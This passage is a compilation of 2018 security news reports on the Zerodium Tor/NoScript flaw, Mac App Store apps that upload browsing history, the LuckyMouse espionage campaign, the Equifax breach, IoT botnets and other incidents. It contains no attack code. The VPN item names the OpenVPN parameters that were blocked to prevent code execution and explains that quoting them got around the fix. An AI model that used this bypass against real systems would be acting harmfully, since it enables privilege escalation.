“This was a bug in NoScript and not a zero-day exploit of Tor Browser that could circumvent its privacy protections. For bypassing Tor, a real browser exploit would still be needed,” the Tor Project explained.

“If a user sets his Tor browser security level to ‘Safest’ to block JavaScript from all websites (e.g. to prevent browser exploits or data gathering), the exploit would allow a website or a hidden service to bypass all NoScript restrictions and execute any JavaScript code despite the maximum security level being used, making it totally ineffective,” Chaouki Bekrar, the CEO of Zerodium, told SecurityWeek.

Bekrar confirmed to have acquired the zero-day vulnerability “many months ago” and shared it with law enforcement and government customers.

The worrying news is that Bekrar confirmed to have acquired “high-end Tor exploits” as part of its bug bounty program. In September the ZERODIUM announced it will pay up to $1 million for fully working zero-day exploits for Tor Browser on Tails Linux and Windows OSs.

Bekrar highlighted that the exploits have been used by its customers to “fight crime and child abuse, and make the world a better and safer place for all.”

Don’t waste time, upgrade your browser to the newest release.


Trend Micro Apps removed from Mac App Store after being caught exfiltrating user data
11.9.2018 securityaffairs
Vulnerebility

Several anti-malware apps developed by Trend Micro have been removed from the Mac App Store because they were harvesting users’ browser history and other info.
Several anti-malware apps developed by Trend Micro, including Dr Cleaner, Dr. Unarchiver, Dr Antivirus, and App Uninstall, have been removed from the Mac App Store after researchers discovered they were harvesting users’ browser history and other information.

At the time of writing, it is not clear if Trend Micro removed the apps itself following complaints or if Apple removed them due to their activities.

The security researcher that handle the Twitter account Privacy First first reported the alleged unethical behavior and published a video that shows how the app harvest users ‘data.

Former NSA white hat hacker Patrick Wardle reported last week that Trend Micro apps were also collecting users’ personal data including their browsing history and then uploaded that data in a password-protected archive to a server.

“Moreover, the network proxy monitor (Charles Proxy) captures a connection attempt from Adware Doctor to adscan.yelabapp.com:” “By editing the system’s /etc/hosts file we can redirect this request to a server we control and can capture what Adware Doctor is trying to upload. And what do you think that might be? If you guessed the history.zip file you would be correct!” wrote Wardle.


“The uploaded ‘history.zip’ archive is password protected:”

Wardle highlighted that the applications he analyzed were signed off by Trend Micro and approved by Apple.

“From a security and privacy point of view, one of the main benefits of installing applications from the official Mac App Store is that such applications are sandboxed,” Wardle added.

“The other benefit is that Apple supposedly vets all submitted applications – but as we’ve clearly shown here, they (sometimes?) do a miserable job.)”

Trend Micro has admitted that browser histories were collected as part of the code’s installation. In a statement today, the biz said:

“Dr Cleaner, Dr Cleaner Pro, Dr Antivirus, Dr Unarchiver, Dr Battery, and Duplicate Finder collected and uploaded a small snapshot of the browser history on a one-time basis, covering the 24 hours prior to installation. This was a one-time data collection, done for security purposes (to analyze whether a user had recently encountered adware or other threats, and thus to improve the product & service).” reads the official reply published by the company.

“The data collected was explicitly identified to the customer in the data collection policy and is highlighted to the user during the install. The browser history data was uploaded to a US-based server hosted by AWS and managed/controlled by Trend Micro.”

Trend announced it is removing the suspicious feature from its application.

Just yesterday I reported the news of a group of security researchers behind the Guardian mobile firewall app that revealed that a growing number of iOS apps currently collect location data, WiFi network IDs and other data, from iPhone users and sell them to advertising companies.

Let me immediately highlight that these iOS apps collect data by asking users for permission to do it, but lack to inform users that gathered information are shared with third-party advertising and marketing companies.

The experts have observed that all these apps have embedded tracking codes provided by advertising and marketing firms.

“The GuardianApp team has discovered that a growing number of iOS apps have been used to covertly collect precise location histories from tens of millions of mobile devices, using packaged code provided by data monetization firms. In many cases, the packaged tracking code may run at all times, constantly sending user GPS coordinates and other information.” states the Guardian app research team.

“In order to gain initial access to precise data from the mobile device’s GPS sensors, the apps usually present a plausible justification relevant to the app in the Location Services permission dialog, often with little or no mention of the fact that location data will be shared with third-party entities for purposes unrelated to app operation.”


China-linked Hackers Use Signed Network Filtering Driver in Recent Attacks
10.9.2018 securityweek CyberSpy

A cyber-espionage group believed to be operating out of China has been using a digitally signed network filtering driver as part of recent attacks, Kaspersky Lab reports.

Tracked as LuckyMouse, Emissary Panda, APT27 and Threat Group 3390, the actor has been active since at least 2010, hitting hundreds of organizations worldwide (U.S. defense contractors, financial services firms, a European drone maker, and a national data center in Central Asia, among others).

Over the past several months, the actor has been abusing the digitally signed 32- and 64-bit network filtering driver NDISProxy to inject a previously unknown Trojan into the lsass.exe system process memory.

The most interesting aspect of the incidents, however, was that the driver was signed with a digital certificate belonging to Shenzhen, Guangdong-based information security software developer LeagSoft. The company was notified of the certificate abuse.

Highly targeted at Middle Asian government entities, Kaspersky is confident that LuckyMouse is behind it.

As part of the campaign, the actor used a dropper supposedly distributed through networks that were already compromised, and not through spear-phishing emails. The executable files can install both 32-bit and 64-bit drivers, depending on the target, and log all installation process steps.

The installer sets an autorun Windows service running NDISProxy and achieves persistency, and also adds the encrypted in-memory Trojan to the system registry. The network filtering driver decrypts and injects the Trojan into memory and filters port 3389 (Remote Desktop Protocol, RDP) traffic to inject the command and control (C&C) communication into it.

The final payload in the attack is a C++ Trojan that works as an HTTPS server and which waits passively for communications from the C&C.

These three modules (installer, driver, and Trojan) allow attackers to silently move laterally across infected infrastructure. However, because no communication with the C&C is available if the infected host only has a LAN IP, the Earthworm SOCKS tunneler is used to connect the LAN of the infected host to the external C&C server.

“They also used the Scanline network scanner to find file shares (port 135, Server Message Block, SMB) which they use to spread malware with administrative passwords, compromised with keyloggers,” Kaspersky reveals.

The injected Trojan is a full-featured RAT that can execute common tasks onto the compromised machine, including running commands and downloading/uploading files. The malware is used for data harvesting, lateral movement, and for the creation of SOCKS tunnels to the C&C.

The use of the publicly-available Earthworm tunneler is common to Chinese-speaking actors and one of the commands used by the attackers creates a tunnel to a previously known LuckyMouse server, which, paired with the choice of victims in this campaign, suggests that this actor is behind the attacks, Kaspersky says.

“We have observed a gradual shift in several Chinese-speaking campaigns towards a combination of publicly available tools (such as Metasploit or CobaltStrike) and custom malware (like the C++ last stage RAT described in this report). We have also observed how different actors adopt code from GitHub repositories on a regular basis. All this combines to make attribution more difficult,” Kaspersky concludes.


Attackers Made 9,000 Unauthorized Database Queries in Equifax Hack: Report
10.9.2018 securityweek Hacking

It took Equifax 76 days to detect the massive 2017 data breach, despite the fact that attackers had conducted roughly 9,000 unauthorized queries on its databases, according to a new report from the U.S. Government Accountability Office (GAO).

In mid-May 2017, malicious actors exploited a known vulnerability in the Apache Struts development framework to gain access to Equifax systems. The company said the breach affected roughly 145 million customers – mostly in the U.S., but also in Canada and the United Kingdom. The incident resulted in social security numbers, dates of birth, email addresses, addresses, driver’s license numbers, payment cards, dispute documents, and other data getting compromised.

Now, roughly one year after the breach came to light, the GAO published a report detailing the Equifax breach. The agency’s report, commissioned by several U.S. senators and representatives, is based on documents from Equifax and the cybersecurity consultants called in by the company following the breach, public statements filed by Equifax, and documents from the Internal Revenue Service (IRS), Social Security Administration (SSA), and U.S. Postal Service (USPS).

According to the GAO report, attackers started scanning Equifax’s systems for the Struts vulnerability just a few days after the existence of the security hole was made public. One of the affected systems was an online dispute portal, on which the attackers gained the ability to execute system-level commands. That enabled them to start querying tens of databases in an effort to find personally identifiable information (PII).

Equifax’s security systems not only failed to detect the Struts vulnerability in the online portal, they also failed to detect the attackers once they gained access.

The GAO says the hackers executed roughly 9,000 database queries, some of which returned personal information. The breach was ultimately detected by the company’s security team during routine checks.

“As reported by Equifax, a network administrator conducting routine checks of the operating status and configuration of IT systems discovered that a misconfigured piece of equipment allowed attackers to communicate with compromised servers and steal data without detection. Specifically, while Equifax had installed a device to inspect network traffic or evidence of malicious activity, a misconfiguration allowed encrypted traffic to pass through the network without being inspected,” the GAO report reads.

The misconfiguration was caused by a digital certificate that had expired 10 months before the breach occurred, which allowed the attackers to run commands and exfiltrate data over an encrypted connection without being detected.

The investigation that followed the breach also revealed that the credit reporting agency had failed to implement proper network segmentation, enabling malicious actors to access many databases beyond those related to the online dispute portal that they initially hacked.

Another problem highlighted in the report is related to the fact that credentials for accessing multiple databases were stored without being encrypted in one database that the attackers accessed.

The GAO pointed out that the 9,000 queries run by the attackers showed the lack of restrictions for the frequency of database queries – the number of queries conducted for normal operations would have been much smaller.

The report notes that the IRS, SSA and USPS, which conducted their own investigations into the incident, made some modifications to their contracts with Equifax – they changed notification requirements for future breaches – and the IRS even terminated one of its contracts.

However, following the GAO report, many rushed to point out that no real actions were taken against Equifax.

The Consumers Union, the advocacy division of Consumer Reports, noted that not much has changed since the incident became public.

“Americans remain largely in the dark about the practices of the credit reporting industry—and, more generally, largely unable to control the use of their personal information,” the organization said. “Equifax itself has suffered minimal consequences and continues to do business more or less as before. And the legal and regulatory system governing the credit reporting industry and data security more broadly remains inadequate, despite some recent progress.”

Senator Elizabeth Warren, one of the officials who commissioned the GAO report and who a few months ago published a report of her own, commented, “One year after they publicly revealed the massive 2017 breach, Equifax and other big credit reporting agencies keep profiting off a business model that rewards their failure to protect personal information - and the Trump Administration and Republican-controlled Congress have done nothing.”


IoT Botnets Target Apache Struts, SonicWall GMS
10.9.2018 securityweek IoT

The infamous Mirai and Gafgyt Internet of Things (IoT) botnets are targeting vulnerabilities in Apache Struts and the SonicWall Global Management System (GMS), Palo Alto Networks has discovered.

The Mirai variant observed in attacks last week packs exploits for 16 vulnerabilities, including one targeting CVE-2017-5638, the Apache Struts vulnerability that led to the Equifax data breach in 2017.

The domain currently hosting the new Mirai samples was resolving to a different IP address in August, and was seen hosting samples of the Gafgyt botnet (aka BASHLITE) that included an exploit for CVE-2018-9866, a flaw in older versions of SonicWall's Global Management System (GMS).

Another interesting characteristic of the new Mirai samples, Palo Alto Networks’ security researchers say, is that they no longer include the brute-force functionality generally used by the infamous IoT malware.

Ever since its source code was posted online in October 2016, Mirai has been continuously evolving, and the switch towards targeting vulnerabilities rather than brute-forcing credentials has been observed in other botnet samples as well.

Gafgyt’s newly acquired exploit is targeting a vulnerability affecting unsupported versions of SonicWall GMS (8.1 and older), the researchers point out. The first sample to target the flaw emerged on August 5, less than a week after an exploit for it was added to Metasploit.

“The incorporation of exploits targeting Apache Struts and SonicWall by these IoT/Linux botnets could be an indication of a larger movement from consumer device targets to enterprise targets,” Palo Alto Networks notes.

“All organizations should ensure they keep not only their systems up-to-date and patched, but also their IoT devices,” the security firm said.

Capable of launching powerful distributed denial of service (DDoS) attacks, both Mirai and Gafgyt have shown a surge in activity over the past several months. Now capable of infecting more than just IoT devices, these botnets pose increasingly higher risks to consumers and businesses alike.

UPDATE. “The vulnerability disclosed in this post is not an announcement of a new vulnerability in SonicWall Global Management System (GMS). The issue referenced only affects an older version of the GMS software (version 8.1) which was replaced by version 8.2 in December 2016. Customers and partners running GMS version 8.2 and above are protected against this vulnerability,” a SonicWall spokesperson told SecurityWeek in an emailed comment.

“Customers still using GMS version 8.1 should apply a hotfix supplied by SonicWall in August 2018 and plan for an immediate upgrade, as GMS 8.1 went out of support in February 2018. SonicWall and its threat research team continuously updates its products to provide industry-leading protection against the latest security threats, and it is therefore crucial that customers are using the latest versions of our products. We recommend that customers with older versions of GMS, which are long out of support, should upgrade immediately,” the spokesperson continued.


Professionalizing Cybersecurity Practitioners
10.9.2018 securityweek Cyber

The formation of a professional body to provide standards of excellence within cybersecurity practitioners has been mooted for many years. Now the UK government has proposed the development of an institution for “developing the cybersecurity profession, including through achieving Royal Chartered status by 2020.”

This is the professionalization of cybersecurity in everything but name. ‘Regulation’ is not mentioned in the proposal; but just as the General Medical Council regulates medical practitioners, so a potential UK National Cybersecurity Council might eventually regulate cybersecurity practitioners.

This could include setting and requiring cybersecurity qualifications and setting the level of qualifications needed in specific industries. While this will inevitably raise the technical level of many cybersecurity practitioners, it could potentially mean that some practitioners could not be employed by some – if not all – companies without attaining a predefined level of qualifications.

This is not yet the inevitable outcome of the government proposals, which are outlined in a consultation document titled, Developing the Cyber Security Profession in the UK (PDF). The consultation closed August 31, 2018, and the government is currently analyzing feedback.

The proposal

The proposal is that the cybersecurity profession delivers on four specific themes by 2021. These are professional development, professional ethics, thought leadership and influence, and outreach and diversity. Each of these themes is discussed and followed by one or more relevant consultation questions.

Underpinning the proposed role of the National Cybersecurity Council is the CyBOK project – the development of a Cybersecurity Body of Knowledge – being led by Professor Awais Rashid at the university of Bristol. The overall aim of the CyBOK project is to codify the foundational and generally recognized knowledge in cybersecurity.

This project is ongoing. The first phase, completed in October 2017, defines 19 knowledge areas (KAs) of cybersecurity. The government proposal says, “The depiction of the 19 Knowledge Areas sets the scope of cybersecurity to shape approaches for training, standard setting, the dissemination of expert opinion, and the execution of professionalism.”

CyBOK

The 19 KAs of the CyBOK

There is much that is good in the proposals. For example, the government expects to support the development of the professional body, but to then step aside so that it is “fully independent of government.”

However, there is also much that can be criticized. Firstly, it is not a discussion document on what should be done, but one on how to achieve what has already been decided – that is, the formation of a National Cybersecurity Council.

Perhaps even more concerning, however, is that the Council is to be derived from existing organizations rather than individuals. “We envisage,” says the proposal, “the Council would have organizational rather than individual membership and be made up of existing professional bodies and other organizations with an interest in cybersecurity.”

While nobody will deny the great work already undertaken by many of these existing organizations, the fact remains that that they are basically businesses that have sometimes been described as primarily designed to sell certificates.

The lack of direct representation by the very people that are meant to be represented – the individual cybersecurity professionals – could be a worrying development.

Support from existing professional bodies

Existing professional cybersecurity organizations have expressed strong support and have banded together to form an ‘Alliance’ in support of the government’s proposals. The Alliance membership currently comprises BCS, The Chartered Institute for IT, Chartered Institute of Personnel & Development (CIPD), the Chartered Society of Forensic Sciences (CSofFS), CREST, The Engineering Council, IAAC, The Institution of Analysts and Programmers (IAP), The IET, Institute of Information Security Professionals (IISP), Institute of Measurement and Control (InstMC) ISACA, (ISC)2, techUK, The Security Institute, and WCIT, The Worshipful Company of Information Technologists.

A typical expression of support includes, from Deshini Newman, MD EMEA (ISC)2, “We are reaching an important milestone in the maturity of our profession with the intent to develop a nationally-recognized professional body and consideration for chartered status. The UK is taking a leadership role in this effort that may well set an example for governments around the world. We are keen to support their work.”

Michael Hughes, board director of ISACA, adds, “We believe objectives such as the prioritization of benchmarking cyber capabilities and a sharper focus on the need to fortify the pipeline of highly skilled, well-trained cybersecurity professionals put the alliance on track to serve as a valuable resource in support of the UK National Cyber Security Strategy.”

The Chair of the IISP, Dr. Alastair MacWillson, told SecurityWeek, “The IISP has been involved in this initiative from the outset… These discussions have led to the DCMS launching last [July’s] consultation to create a new UK Cyber Security Council to develop the cybersecurity profession in the UK… What is being proposed by the Government through this initiative, is the most profound development of governance for the information security profession that we have seen.”

It is no surprise that existing professional bodies will support the government approach to professionalization – those that don’t will lose ground to those that do. But nowhere in this proposal or support for the proposal, is the voice of the practitioners.

Views from the coalface

The opinions of existing cybersecurity practitioners and individual security consultants range from support through ‘a good but unworkable idea’ to reserved condemnation.

Martin Zinaich (information security officer at the City of Tampa, Florida), has long advocated the formation of a professional body for cybersecurity practitioners able to uphold and maintain professional standards. He wrote a paper on the subject and sees similarities in the UK proposal to his own ideas.

He believes that professionalization is not merely a good idea, but an essential step towards improving the overall quality of cybersecurity. He has some concerns over the involvement of government. He believes a light touch – as suggested in the government proposal – is feasible; but probably not likely. He has always held the view that professionalization is ultimately inevitable, and that if practitioners don’t do it themselves, governments will do it to them.

“The idea,” he told SecurityWeek, “that such critical ubiquitous lifeblood like technology, the internet and IoT will not be regulated heavily, as each new breach expands its impact, is very short sighted. We either lead this effort or get lead.”

The concept of a professional body promoting expertise is widely welcomed; but government involvement is sometimes questioned. “In principle, I think it’s a good idea,” says Paul Simmonds, CEO at The Global Identity Foundation; co-founder of the Jericho Forum. “In fact, when I supported the setting up of the IISP over 10 years ago that's what I hoped they were going to be.”

But he has his own concerns: “Unlike many other professional bodies, security moves an order of magnitude faster, so the worry is that the ‘grandees’ who define the bar for qualification cannot keep up with the speed of change – and we thus continue to implement 1990s-based perimeterized networks.”

Raef Meeuwisse, author of Cybersecurity for Beginners, believes the proposal is a bad idea. “Existing cybersecurity professionals will look at any additional overhead or demands imposed by any national training standards and think; not this. They will vote with their feet and move their skills on to more savvy international employers.”

Meeuwisse believes that top talent rarely bothers with certifications, “not only because their talent speaks for itself but more importantly because training and certification content often lags behind the operational reality by a number of years.”

He fears that rather than levelling cybersecurity professionalism up, a National Cyber Security Council will level down by driving the most able people out of the UK. “Any national registration or requirements,” he told SecurityWeek, “would just act as a deterrent to the best cybersecurity professionals taking up roles in the UK, because the success of the best cybersecurity professionals is built around having a global and international focus.” Rather than solving the cybersecurity problem within the UK, he fears that a national council will simply make it worse.

Meeuwisse is not alone in questioning the absolute need for certifications. Steven Lentz, CSO and director of information security at Samsung Research America, makes a similar point. “There are a lot of security practitioners that do not have security certifications or memberships; but does that mean they do not know their field? They may have been practicing for 10+ years but never had the time to certify. Membership and certification qualities are helpful but depending on the job, job experience is the key.”

Such professionals are well-aware of the existing problems within their industry. One expert, preferring to remain anonymous because he is an ‘official’ in one of the Alliance member organizations, explained, “There are serious problems that remain in the cybersecurity field today, which have existed for a long time. These problems relate to inadequate level of knowledge in security practitioners, lack of measurement performed on activities, and methodologies, poor judgement and decision making in risk management, insufficient communication at many different levels within and between organizations, limited business alignment and limited security assurance provided to stakeholders.”

He believes establishing a cybersecurity profession can help with this, but he has some worries. “The nature of the work we do in managing information risk is very broad, covering disciplines as diverse as strategy, architecture, software development, operations, supply chain risk, incident management, business continuity and assurance. A profession should cover these and other disciplines/practices. Restricting the scope to cybersecurity will likely be too narrow.”

He sees CyBOK itself as problematic. “We need a strong, comprehensive and balanced framework on which to build the profession. I think the contents of the CyBOK, as it currently stands, is problematic for two reasons. Firstly, why would you include capabilities like governance, law, regulation and privacy when they are already covered elsewhere? And secondly, why would you exclude coverage of essential disciplines like psychology, economics, decision theory, social science and statistics, when they are so important to effective cybersecurity?”

The idea that a formal professional body for cybersecurity professionals is a positive and welcome step – but that it has problems – is common. Independent security consultant Stewart Twynham acknowledges that there must be change. “Look at any job ad for a ‘cybersecurity professional’ and you’ll see a long list of must-have training and certifications costing anywhere from £5,000 to £25,000 – along with experience pre-requisites that rule out most candidates. Something has to change… but at the same time we must also be mindful of the rule of unintended consequences.”

He points to the 1986 NHS Project 2000 that was designed to turn nursing into a professional career. “Thirty-two years on and the NHS now faces one of the greatest recruitment crises in its 70-year history amid concerns that nurses are now academics, taught by academics and are no-longer bringing the softer skills into hospitals that the role so desperately requires.”

David Ginsburg, VP of marketing at Cavirin, comments, “The concept of security as an accredited profession is a noble concept. However, it should not be at the risk of interfering with the free market or making it overly difficult for new entrants due to entrenched professional bodies.”

He suggests that the U.S. concept of the ‘professional engineer’ could provide a useful blueprint. “A compromise could be the equivalent of the professional engineer (PE) in the U.S., where individuals are not precluded from utilizing the latest technologies and approaches. In California, we have PEs as diverse as electrical, nuclear, traffic, and chemical; and I could easily see cybersecurity added to the list.”

While most practitioners seem to feel that a professional body is a good idea but with problems and difficulties, there are others more strongly in favor. “Personally, I think it’s a good thing,” Steve Furnell, associate dean and professor of IT security at Plymouth University, told SecurityWeek: “not least because it underlines cybersecurity as being a profession and thereby meriting consideration in its own right, as opposed to being viewed as part of IT, and implying that any qualified IT practitioner might also be suitable to have a stab at security.”

He doesn’t believe it has to be ‘membership by qualification’, but rather by evidence of skills and capability. “Qualifications and certifications are means by which some aspects might be demonstrated,” he continued, “but practitioner experience should count towards the level that can be achieved. Businesses looking to employ staff would, of course, be well-advised to employ people with the right skills, and holding membership of the professional body could prove to be a means of demonstrating this.”

Randy Potts, an information security leader in the Dallas, Texas area, also supports the idea. “At this point, we need all the help we can get, and another council/organization/body might have more success. I do not see this as the final answer, but the new council seems at least focused on clarifying qualifications and career paths, which will aid those looking to enter,” he told SecurityWeek.

“SANS and US government bodies work together on frameworks regularly. I was a fan of the Australian DoD Top 35 too,” he continued. “This seems to be the furtherance of such initiatives. The government working with outside parties is a good way to get multiple perspectives. I think of all the great talent being produced by the Israeli Defense Forces and the startup activity in Tel Aviv as a result.”

CyBOK

The idea of a professional body to raise and maintain cybersecurity standards is good – but there are many concerns over how it may be implemented.

While individual practitioners could voice their opinions during the consultation period of August 2018, they are precluded from being a part of the National Cyber Security Council itself. This implies that the Council will operate as a controlling organization rather than a forum for practitioners.

There is some concern that the existing General Medical Council (GMC) may be the blueprint for the National Cyber Security Council. Qualified medical doctors must be registered with the GMC before they can practice – and there are many examples of doctors being ‘struck off’ for voicing the wrong opinions.

If the GMC is the blueprint, there are also concerns that security product vendors may come to wield too much influence over the GSC, just as there are current concerns that the pharmaceutical companies influence the GMC.

“Influence from drug companies are a problem in the [medical practitioner] space,” is one comment received. “How much of a risk I don’t know but I’ve learnt a lot from Ben Goldacre. For cybersecurity this is a similar risk and will need to be acknowledged and managed.” (Ben Goldacre is author of Bad Pharma: How Drug Companies Mislead Doctors and Harm Patients.)

There is a question over whether the government will be able to fully step aside and leave an established National Cyber Security Council as a fully independent body. Will the government ever be able to let go of control? “No,” says Steven Lentz. “The government thinks it knows all but actually is behind the times in my opinion. Too much politics to really help. The government can maybe have an advisory role but should not run anything.”

“I don't know if government does need to let go,” counters Randy Potts. “If this is effective and successful then I see the government not wanting to let go. If the initiative is a failure, the whole initiative will likely fade away or perhaps never take off.”

The devil will be in the detail going forward. Done correctly, a professional body will benefit the nation, its businesses, and the practitioners. Done badly, it could prove an unmitigated disaster.

“I do think the benefit of an information risk management profession (i.e. beyond just cybersecurity) outweighs the risk, although it will need to be managed. It could even be an opportunity to show how an emerging profession can lead the way and act as a role model for other professions. Is this idealistic? Probably.”

There is one final question worth asking. If the formation of an overarching professional body is such an attractive concept that all the existing professional organizations (the ‘Alliance’) offer such strong support – why did they not come together of their own accord without first requiring the intervention of government?


VPN Firms Release New Patches for Privilege Escalation Flaw
10.9.2018 securityweek
Vulnerebility

Virtual private network (VPN) service providers ProtonVPN and NordVPN have made another attempt to patch a potentially serious privilege escalation vulnerability that they first tried to address a few months ago.

Fabius Watson of VerSprite Security discovered in March that the Windows versions of the ProtonVPN and NordVPN applications were affected by a vulnerability that could have been abused to execute arbitrary code with elevated privileges. The vendors released patches in April.

However, Cisco researchers discovered that the initial patch could be easily bypassed, triggering a new round of updates from ProtonVPN and NordVPN.

The flaw, initially tracked as CVE-2018-10169, allowed an attacker with low privileges to execute arbitrary code with elevated permissions by making changes to the OpenVPN configuration file. Specifically, an attacker could have added a parameter such as “plugin” or “script-security” to the configuration file and the file specified through these parameters would get executed by OpenVPN with admin privileges.

Both ProtonVPN and NordVPN attempted to resolve the issue by ensuring that the “plugin,” “script-security,” “up” or “down” strings could not be added to the configuration file – all of these parameters allow code or command execution through the VPN program.

However, Cisco researchers discovered that simply adding these parameters in quotation marks in the configuration file bypassed the patch. The company has published a simple proof-of-concept (PoC) exploit that shows how the vulnerability can be exploited to execute Notepad in Windows.

ProtonVPN and NordVPN have now released new fixes, which should be much more effective. They now prevent users with limited privileges from making any kinds of modifications to the configuration files.

The vulnerability is tracked as CVE-2018-3952 (NordVPN) and CVE-2018-4010 (ProtonVPN), and it has been classified as “high severity” for both applications. NordVPN released a patch on August 8, but ProtonVPN made the second fix available only in early September.

“The new patches developed by the editors are different. For ProtonVPN, they put the OpenVPN configuration file in the installation directory, and a standard user cannot modify it. Thus, we cannot add the malicious string in it. For NordVPN, the editor decided to use an XML model to generate an OpenVPN configuration file. A standard user cannot edit the template,” Cisco said in a blog post.


Google Launches Alert Center for G Suite
10.9.2018 securityweek Security

Google is making it easier for G Suite administrators to access notifications, alerts, and actions by bringing them all together in a single place with the launch of a new alert center.

Currently available in Beta, the alert center provides admins with a comprehensive view on essential notifications, and allows them to easily take actions to better serve and protect their organizations, Google says. The new feature was designed deliver insights to help admins better assess an organization’s exposure to security issues at the domain and user levels.

“In addition, G Suite Enterprise edition domains can use the G Suite security center for integrated remediation of issues surfaced by alerts,” the Internet company explains.

The alert center will bring together notifications on security threats and monitoring, as well as critical system alerts.

As part of the Beta launch, the center includes three types of alerts: Google Operations (details on G Suite security and privacy issues that Google is investigating), Gmail phishing and spam (spikes in user-reported phishing), and mobile device management (information on devices that are exhibiting suspicious behavior or have been compromised).

The Beta program has been launched for all G Suite customers.

Additionally, Google is making it easier for users to set phones and tablets as company-owned devices. Starting on September 19, all users who add their G Suite account to a new Android device before adding their personal account will be asked to set up the device as their own or as company-owned.

“If you have advanced mobile device management but don’t register your company-owned devices in the Admin console, your users must choose to set up their devices as company-owned,” Google explained.

At the moment, the choice is only displayed to users if their organizations have Device Owner mode enabled. Starting September 19, that option will disappear from the Admin console and a new screen will be displayed to them on new (and recently factory-reset) devices running Android 6.0 or higher.

Also on September 19, users with company-owned Android devices and work profiles will be allowed to install any app from the managed Google Play store by default. Organizations, however, can restrict app availability to whitelisted apps.


Mac Apps From Apple's App Store Steal User Data, Researchers Say
10.9.2018 securityweek Apple

Mac applications distributed via Apple’s official App Store marketplace are collecting and exfiltrating sensitive user data, security researchers have discovered.

The multiple programs exhibiting such behavior send the collected data to the developer’s infrastructure, but some of the data ends up on Chinese servers, “which may not be subject to the same stringent requirements around storage and protection of personally identifiable information like organizations based in the US or EU,” Malwarebytes says.

One of the offending applications is Adware Doctor, which Objective-See’s Patrick Wardle found exfiltrating browser history (targeting Safari, Chrome, and Firefox), a list of all running processes, and a list of software that the user has downloaded (and from where).

To gain access to the list of running processes, the developer found a way to bypass Apple’s sandbox protections. By posing as a security-related app, the software can request file-access permissions that otherwise would not be granted to it.

Despite its malicious purpose, Adware Doctor managed to become highly popular, being the fourth top paid software in the official Mac App Store, and first in the paid utilities section. Apple has removed the software from the store, but it might not be long before it returns.

This has happened in the past. The app first emerged in the Mac App Store a couple of years ago, named Adware Medic, a rip off of Thomas Reed’s highly-successful app with the same name, which became Malwarebytes for Mac. Apple pulled it after being informed on the matter, but within weeks the app returned as Adware Doctor.

“We’ve continued to fight against this app, as well as others made by the same developer, and it has been taken down several times now, but in a continued failure of Apple’s review process, is always replaced by a new version before long,” Malwarebytes’ Thomas Reed explains.

Open Any Files: RAR Support is yet another app that shows a similar behavior, collecting user data in a .zip archive and uploading the file to a developer’s server. Exfiltrated data included complete browsing and search history for Safari, Chrome, and Firefox, and complete App Store browsing history. Recently, the software stopped siphoning said data.

The app was also designed to promote Dr. Antivirus, usually when the user opens an unfamiliar file (often claiming that an infection is preventing the user from opening the file). Reed says Open Any Files dropped on their radar last year and was reported to Apple in December 2017.

Dr. Antivirus, in addition to lacking good detection rates, was also observed exhibiting “the same pattern of data exfiltration as seen in Open Any Files! We saw the same data being collected and also uploaded in a file named file.zip to the same URL used by Open Any Files,” Reed notes.

In addition to browsing history, the file was found to contain detailed information about every application found on the system.

As it turns out, other applications from the same developer have data exfiltration capabilities, including Dr. Cleaner (which doesn’t collect the list of installed applications). The website that promotes these apps appears to be owned by an individual living in China.

The main issue, Reed says, is that Apple allows for such apps to be listed in the official store and that it is sometimes slow to take action on the offending applications, despite researchers’ reports. Thus, users should pay attention when downloading software from the Mac App Store, as some applications could be dangerous.

“It’s blindingly obvious at this point that the Mac App Store is not the safe haven of reputable software that Apple wants it to be. I’ve been saying this for several years now, as we’ve been detecting junk software in the App Store for almost as long as I’ve been at Malwarebytes. This is not new information, but these issues reveal a depth to the problem that most people are unaware of,” Reed points out.


GAO Report shed the lights on the failures behind the Equifax hack
10.9.2018 securityaffairs Incindent

A new report from the U.S. Government Accountability Office (GAO) provides detailed information of the Equifax hack.
The Equifax hack occurred in May 2017 when attackers exploited the CVE-2017-5638 Apache Struts vulnerability in the Jakarta Multipart parser upload function.

The flaw allowed the attacker to make a maliciously crafted request to an Apache web server and gain access the underlying machine.

The credit reporting agency confirmed that a total of 145.5 million individuals have been exposed, hackers accessed names, social security numbers, dates of birth, addresses and, in some cases, driver’s license numbers and credit card numbers.

Now U.S. Government Accountability Office (GAO) published a report on the Equifax hack that includes further details on the incident. The report was commissioned by several U.S. senators and representatives, it is based on documents provided by Equifax itself and the cybersecurity consultants involved in the incident response and in the investigation. The reports also refers documents from the Internal Revenue Service (IRS), Social Security Administration (SSA), and U.S. Postal Service (USPS).

The report confirms that hackers targeted Equifax exploiting the Struts vulnerability, they made a reconnaissance a few days after the Struts flaw was publicly disclosed.

Equifax hack

The attackers breached an online dispute portal than queried internal databases in an effort to find personally identifiable information (PII).

“In July 2017, Equifax system administrators discovered that attackers had gained
unauthorized access via the Internet to the online dispute portal that maintained
documents used to resolve consumer disputes (see fig.). The Equifax breach
resulted in the attackers accessing personal information of at least 145.5 million
individuals.” states the report.

Equifax took 76 days to detect the massive 2017 data breach.

The experts highlighted that Equifax hack was the result of the failure of four major activities under the control of the security team, the identification, the detection, the segmenting of access to databases, and data governance.

The analysis of the log files revealed that attackers executed approximately 9,000 queries to access data containing PII.

9,000 queries run by the attackers is much more than the number of queries normally executes, highlighting the lack of control operated by the security team.

Equifax officials stated that the attackers were able to disguise their activity by blending in with regular network operations, the incident was detected by the security team during routine checks.

“As reported by Equifax, a network administrator conducting routine checks of the operating status and configuration of IT systems discovered that a misconfigured piece of equipment allowed attackers to communicate with compromised servers and steal data without detection.” continues the GAO Report.

“Specifically, while Equifax had installed a device to inspect network traffic or evidence of malicious activity, a misconfiguration allowed encrypted traffic to pass through the network without being inspected,”

The root cause of the problem was a digital certificate that had expired 10 months before the Equifax hack occurred, this circumstance allowed the attackers to exfiltrate data without being detected because the system was not able to inspect the traffic.

“Equifax stated that the misconfiguration was the result of an expired digital certificate that had not been replaced with a new certificate. Digital certificates are encrypted electronic tokens that are used to authenticate servers and systems. Because this one was expired, the system was unable to inspect encrypted traffic. The network
administrator replaced the expired certificate, allowing the system to resume inspection of traffic.” continues the report.

The lack of network segmentation allowed the attackers to access many internal databases along with the one behind the online dispute portal, experts also pointed out the credentials for accessing multiple archives were stored in plain text in one database accessed by the hackers.

However, many experts criticized the US authorities because even after the publication of the GAO report no real actions were taken against Equifax.

“One year after they publicly revealed the massive 2017 breach, Equifax and other big credit reporting agencies keep profiting off a business model that rewards their failure to protect personal information – and the Trump Administration and Republican-controlled Congress have done nothing.” stated Senator Elizabeth Warren, one of the officials who requested the GAO report.


